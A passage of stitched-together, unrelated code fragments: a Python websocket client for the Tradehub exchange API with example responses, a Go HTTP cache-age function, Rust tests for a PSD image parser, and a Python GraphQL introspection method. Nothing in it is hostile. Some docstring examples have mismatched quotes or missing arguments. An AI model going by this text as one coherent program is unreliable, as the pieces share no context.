f"account_trades_by_market.{market}.{swth_address}" else: channel_name: str = f"account_trades.{swth_address}" await self.subscribe(message_id, [channel_name]) async def subscribe_balances(self, message_id: str, swth_address: str): """ Subscribe to wallet specific balance channel. Example:: ws_client.subscribe_balances('balance', "swth1...abcd') The initial channel message is expected as:: { 'id': 'balance', 'result': ['balances.swth1...abcd'] } The subscription and channel messages are expected as follow:: { 'channel': 'balances.swth1vaavrkrm7usqg9hcwhqh2hev9m3nryw7aera8p', 'result': { 'eth1': { 'available': '0.83941506825', 'order': '0', 'position': '0', 'denom': 'eth1' }, ... } } :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :return: None """ channel_name: str = f"balances.{swth_address}" await self.subscribe(message_id, [channel_name]) async def subscribe_candlesticks(self, message_id: str, market: str, granularity: int): """ Subscribe to candlesticks channel. Example:: ws_client.subscribe_candlesticks('candle', "swth_eth1', 1) The initial channel message is expected as:: { 'id': 'candle', 'result': ['candlesticks.swth_eth1.1'] } The subscription and channel messages are expected as follow:: { 'channel': 'candlesticks.swth_eth1.1', 'sequence_number': 57, 'result': { 'id': 0, 'market':'swth_eth1', 'time': '2021-02-17T10:59:00Z', 'resolution': 1, 'open': '0.000018', 'close': '0.000018', 'high': '0.000018', 'low': '0.000018', 'volume': '5555', 'quote_volume': '0.09999' } } :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param market: Tradehub market identifier, e.g. 'swth_eth1' :param granularity: Define the candlesticks granularity. Allowed values: 1, 5, 15, 30, 60, 360, 1440. :return: None """ if granularity not in [1, 5, 15, 30, 60, 360, 1440]: raise ValueError(f"Granularity '{granularity}' not supported. Allowed values: 1, 5, 15, 30, 60, 360, 1440") channel_name: str = f"candlesticks.{market}.{granularity}" await self.subscribe(message_id, [channel_name]) async def get_order_history(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Request up to 200 order histories. Example:: ws_client.get_order_history('order_history', "swth1vaavrkrm7usqg9hcwhqh2hev9m3nryw7aera8p") The expected return result for this function is as follows:: { "id": "order_history", "result": [ { "order_id": "C7D7DDDCFDC68DF2D078CBD8630B657148893AC24CF8DB8F2E23293C6EDC90AD", "block_height": 7561537, "triggered_block_height": 0, "address": "swth1vaavrkrm7usqg9hcwhqh2hev9m3nryw7aera8p", "market": "wbtc1_usdc1", "side": "sell", "price": "0", "quantity": "0.0011", "available": "0", "filled": "0.0011", "order_status": "filled", "order_type": "market", "initiator": "user", "time_in_force": "fok", "stop_price": "0", "trigger_type": "", "allocated_margin_denom": "wbtc1", "allocated_margin_amount": "0", "is_liquidation": false, "is_post_only": false, "is_reduce_only": false, "type": "", "block_created_at": "2021-02-16T08:31:13.225303Z", "username": "", "id": "2315998" }, ... ] } .. note:: The market identifier is optional and acts as a filter. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ await self.send({ "id": message_id, "method": "get_order_history", "params": { "address": swth_address, "market": market } }) async def get_recent_trades(self, message_id: str, market: str): """ Request up to 100 recent trades for a market. Example:: ws_client.get_recent_trades('recent_trades', "swth_eth1") The expected return result for this function is as follows:: { "id": "recent_trades", "sequence_number": 3, "result": [ { "id": "0", "block_created_at": "2021-02-16T10:21:31.346041707Z", "taker_id": "3F71918F83D84639F505464335FD355105EE63E622CBB819AAFBBAC97368CC7A", "taker_address": "swth1ysezxr46dhd4dzjsswqte35wfm0ml5dxx97aqt", "taker_fee_amount": "3.2475", "taker_fee_denom": "swth", "taker_side": "buy", "maker_id": "343590CF4F54FEB1E2429F60B77CD3BED701A040418AEB914BB41D561E24E7DE", "maker_address": "swth1a5v8pyhkzjjmyw03mh9zqfakwyu0t5wkv0tf66", "maker_fee_amount": "-0.6495", "maker_fee_denom": "swth", "maker_side": "sell", "market": "swth_eth1", "price": "0.0000182", "quantity": "1299", "liquidation": "", "taker_username": "", "maker_username": "", "block_height": "7564715" }, ... ] } .. warning:: The field 'id' is sometimes '0'. This endpoint/channel does not seem to work correct. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ await self.send({ "id": message_id, "method": "get_recent_trades", "params": { "market": market } }) async def get_candlesticks(self, message_id: str, market: str, granularity: int, from_epoch: int, to_epoch: int): """ Requests candlesticks for market with granularity. Example:: ws_client.get_candlesticks('recent_trades', "swth_eth1") The subscription and channel messages are expected as follow:: { 'id': 'candlesticks.swth_eth1.1', 'sequence_number': 57, 'result': [ { 'id': 0, 'market':'swth_eth1', 'time': '2021-02-17T10:59:00Z', 'resolution': 1, 'open': '0.000018', 'close': '0.000018', 'high': '0.000018', 'low': '0.000018', 'volume': '5555', 'quote_volume': '0.09999' } ] } .. note:: Only candles with non empty volume will be returned. Expect almost none or just a few candles with a low granularity. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param market: Tradehub market identifier, e.g. 'swth_eth1' :param granularity: Define the candlesticks granularity. Allowed values: 1, 5, 15, 30, 60, 360, 1440. :param from_epoch: Starting from epoch seconds. :param to_epoch: Ending to epoch seconds. :return: None """ if granularity not in [1, 5, 15, 30, 60, 360, 1440]: raise ValueError(f"Granularity '{granularity}' not supported. Allowed values: 1, 5, 15, 30, 60, 360, 1440") await self.send({ "id": message_id, "method": "get_candlesticks", "params": { "market": market, "resolution": str(granularity), "from": str(from_epoch), "to": str(to_epoch) } }) async def get_open_orders(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Request open orders. Example:: ws_client.get_open_orders('open_orders', "swth1p5hjhag5glkpqaj0y0vn3au7x0vz33k0gxuejk") The expected return result for this function is as follows:: { "id": "open_orders", "result": [ { "order_id": "A7C488A6AE25249E90523FCD603236342025340E3DCAE6A6312133905C41794C", "block_height": 7564973, "triggered_block_height": 0, "address": "swth1p5hjhag5glkpqaj0y0vn3au7x0vz33k0gxuejk", "market": "swth_eth1", "side": "sell", "price": "0.0000181", "quantity": "58806", "available": "58806", "filled": "0", "order_status": "open", "order_type": "limit", "initiator": "amm", "time_in_force": "gtc", "stop_price": "0", "trigger_type": "", "allocated_margin_denom": "swth", "allocated_margin_amount": "0", "is_liquidation": false, "is_post_only": false, "is_reduce_only": false, "type": "", "block_created_at": "2021-02-16T10:30:27.079962Z", "username": "", "id": "2316597" }, ... ] } .. note:: The market identifier is optional and acts as a filter. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ await self.send({ "id": message_id, "method": "get_open_orders", "params": { "address": swth_address, "market": market } }) async def get_account_trades(self, message_id: str, swth_address: str, market: Optional[str] = None, page: Optional[int] = None): """ Request up to 100 account trades. Example:: ws_client.get_account_trades('account_trades', 'swth1vaavrkrm7usqg9hcwhqh2hev9m3nryw7aera8p') The expected return result for this function is as follows:: { "id": "account_trades", "result": [ { "base_precision": 8, "quote_precision": 6, "fee_precision": 6, "order_id": "C7D7DDDCFDC68DF2D078CBD8630B657148893AC24CF8DB8F2E23293C6EDC90AD", "market": "wbtc1_usdc1", "side": "sell", "quantity": "0.0001", "price": "48745.12", "fee_amount": "0.004875", "fee_denom": "usdc1", "address": "swth1vaavrkrm7usqg9hcwhqh2hev9m3nryw7aera8p", "block_height": "7561537", "block_created_at": "2021-02-16T08:31:13.225303Z", "id": 289733 }, ... ] } .. note:: The market identifier is optional and acts as a filter. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1'. :param page: Used for pagination. :return: None """ await self.send({ "id": message_id, "method": "get_account_trades", "params": { "address": swth_address, "market": market, "page": str(page) if page else None } }) async def get_market_stats(self, message_id: str, market: Optional[str] = None): """ Request market stats. Example:: ws_client.get_market_stats('market_stats') The expected return result for this function is as follows:: { "id": "market_stats", "result": { "eth1_usdc1": { "day_high": "1818.51", "day_low": "1751.81", "day_open": "1760.07", "day_close": "1788.19", "day_volume": "36.503", "day_quote_volume": "65153.50224", "index_price": "0", "mark_price": "0", "last_price": "1788.19", "market": "eth1_usdc1", "market_type": "spot", "open_interest": "0" }, ... } } .. warning:: Parameter 'market' has no effect. Maybe not intended as parameter. Request will result in all market stats. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ # TODO market has no effect await self.send({ "id": message_id, "method": "get_market_stats", "params": { "market": market } }) async def get_leverages(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Request leverages. .. note:: The market identifier is optional and acts as a filter. .. warning:: The request method has not been tested yet. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1'. :return: None """ # TODO not tested yet await self.send({ "id": message_id, "method": "get_leverages", "params": { "address": swth_address, "market": market } }) async def get_open_positions(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Request open positions. .. note:: The market identifier is optional and acts as a filter. .. warning:: The request method has not been tested yet. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1'. :return: None """ # TODO not tested yet await self.send({ "id": message_id, "method": "get_open_positions", "params": { "address": swth_address, "market": market } }) async def get_closed_positions(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Request closed positions. .. note:: The market identifier is optional and acts as a filter. .. warning:: The request method has not been tested yet. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1'. :return: None """ # TODO not tested yet await self.send({ "id": message_id, "method": "get_closed_positions", "params": { "address": swth_address, "market": market } }) async def send(self, data: dict): """ Send data to websocket server. Provided data will be translated to json. :param data: data as dictionary. :return: """ await self._websocket.send(json.dumps(data)) def open(self) -> bool: """ Check if the connection is open. :return: Bool """ if not self._websocket: return False return self._websocket.open async def disconnect(self): """ Safely close the websocket connection. :return: """ if self._websocket: await self._websocket.close() async def connect(self, on_receive_message_callback: Callable, on_connect_callback: Optional[Callable] = None, on_error_callback: Optional[Callable] = None): """ Connect to websocket server. .. warning:: Callbacks need to be NON-BLOCKING! Otherwise the PING-PONG coroutine is blocked and the server will close the connection. You will not receive any notification about this. :param on_receive_message_callback: async callback which is called with the received message as dict. :param on_connect_callback: async callback which is called if websocket is connected. :param on_error_callback: async callback which is called if websocket has an error. :return: None """ try: async with websockets.connect(self._uri, ping_interval=self._ping_interval, ping_timeout=self._ping_timeout) as websocket: self._websocket = websocket if on_connect_callback: await on_connect_callback() async for message in websocket: data = json.loads(message) await on_receive_message_callback(data) except Exception as e: if on_error_callback: await on_error_callback(e) else: raise e
// CorrectedAge adjusts the age of a resource for clock skew and travel time func CorrectedAge(h http.Header, reqTime, respTime time.Time) (time.Duration, error) { date, err := timeHeader("Date", h) if err != nil { return time.Duration(0), err } apparentAge := respTime.Sub(date) if apparentAge < 0 { apparentAge = 0 } respDelay := respTime.Sub(reqTime) ageSeconds, err := intHeader("Age", h) if err != nil { return time.Duration(0), err } age := time.Second * time.Duration(ageSeconds) correctedAge := age + respDelay if apparentAge > correctedAge { correctedAge = apparentAge } residentTime := Clock().Sub(respTime) currentAge := correctedAge + residentTime return currentAge, nil }
<reponame>paolobarbolini/psd use failure::Error; use psd::Psd; use psd::PsdChannelCompression; use psd::PsdChannelKind; use std::collections::HashMap; const RED_PIXEL: [u8; 4] = [255, 0, 0, 255]; // const GREEN_PIXEL: [u8; 4] = [0, 255, 0, 255]; const BLUE_PIXEL: [u8; 4] = [0, 0, 255, 255]; // Transparent pixels in the image data section start [255, 255, 255, 0] // const TRANSPARENT_PIXEL_IMAGE_DATA: [u8; 4] = [255, 255, 255, 0]; // In the layer and mask info section we fill in transparent rgba pixels ourselves as [0, 0, 0, 0] // const TRANSPARENT_PIXEL_LAYER: [u8; 4] = [0, 0, 0, 0]; // Test that images that have transparent pixels and don't use compression // return the correct RGBA #[test] fn transparency_raw_data() -> Result<(), failure::Error> { let psd = include_bytes!("./fixtures/3x3-opaque-center.psd"); let psd = Psd::from_bytes(psd)?; let blue_pixels = vec![(1, 1, BLUE_PIXEL), (2, 0, BLUE_PIXEL)]; assert_colors(psd.rgba(), &psd, &blue_pixels); assert_colors( psd.layer_by_name("OpaqueCenter")?.rgba()?, &psd, &blue_pixels, ); Ok(()) } // Test that images that have transparent pixels and use rle compression // return the correct RGBA #[test] fn transparency_rle_compressed() -> Result<(), failure::Error> { let psd = include_bytes!("./fixtures/16x16-rle-partially-opaque.psd"); let psd = Psd::from_bytes(psd)?; let mut red_block = vec![]; for left in 0..9 { for top in 0..9 { red_block.push((left + 1, top + 1, RED_PIXEL)); } } assert_eq!(psd.compression(), &PsdChannelCompression::RleCompressed); assert_colors(psd.rgba(), &psd, &red_block); assert_eq!( psd.layer_by_name("OpaqueCenter")? .compression(PsdChannelKind::Red)?, PsdChannelCompression::RleCompressed ); assert_colors(psd.layer_by_name("OpaqueCenter")?.rgba()?, &psd, &red_block); Ok(()) } // Fixes an `already borrowed: BorrowMutError` that we were getting in the `flattened_pixel` // method when we were recursing into the method and trying to borrow when we'd already borrowed. #[test] fn transparent_above_opaque() -> Result<(), Error> { let psd = include_bytes!("./fixtures/transparent-above-opaque.psd"); let psd = Psd::from_bytes(psd)?; let image = psd.flatten_layers_rgba(&|_| true)?; assert_eq!(image[0..4], BLUE_PIXEL); Ok(()) } // Ensure that the specified, zero-indexed left, top coordinate has the provided pixel color. // Otherwise it should be fully transparent. // (left, top, pixel) fn assert_colors(image: Vec<u8>, psd: &Psd, assertions: &[(usize, usize, [u8; 4])]) { let pixel_count = (psd.width() * psd.height()) as usize; let width = psd.width() as usize; let mut asserts = HashMap::new(); for assertion in assertions { asserts.insert((assertion.0, assertion.1), assertion.2); } for idx in 0..pixel_count { let left = idx % width; let top = idx / width; let pixel_color = &image[idx * 4..idx * 4 + 4]; match asserts.get(&(left, top)) { Some(expected_color) => { assert_eq!(expected_color, pixel_color); } None => { assert_eq!(pixel_color[3], 0, "Pixel should be transparent"); } }; } } fn make_image(pixel: [u8; 4], pixel_count: u32) -> Vec<u8> { let pixel_count = pixel_count as usize; let mut image = vec![0; pixel_count * 4]; for idx in 0..pixel_count { image[idx * 4] = pixel[0]; image[idx * 4 + 1] = pixel[1]; image[idx * 4 + 2] = pixel[2]; image[idx * 4 + 3] = pixel[3]; } image } fn put_pixel(image: &mut Vec<u8>, width: usize, left: usize, top: usize, new: [u8; 4]) { let idx = (top * width) + left; image[idx * 4] = new[0]; image[idx * 4 + 1] = new[1]; image[idx * 4 + 2] = new[2]; image[idx * 4 + 3] = new[3]; }
async def introspect( self, headers: Optional[Dict[str, str]] = None ) -> graphql.GraphQLSchema: request = GraphQLRequest( query=graphql.get_introspection_query(descriptions=False), validate=False, headers=headers, ) introspection = await self.query(request) try: return graphql.build_client_schema(introspection=introspection.data) except TypeError: raise GraphQLIntrospectionException( f"Failed to build schema from introspection data: {introspection.errors}" )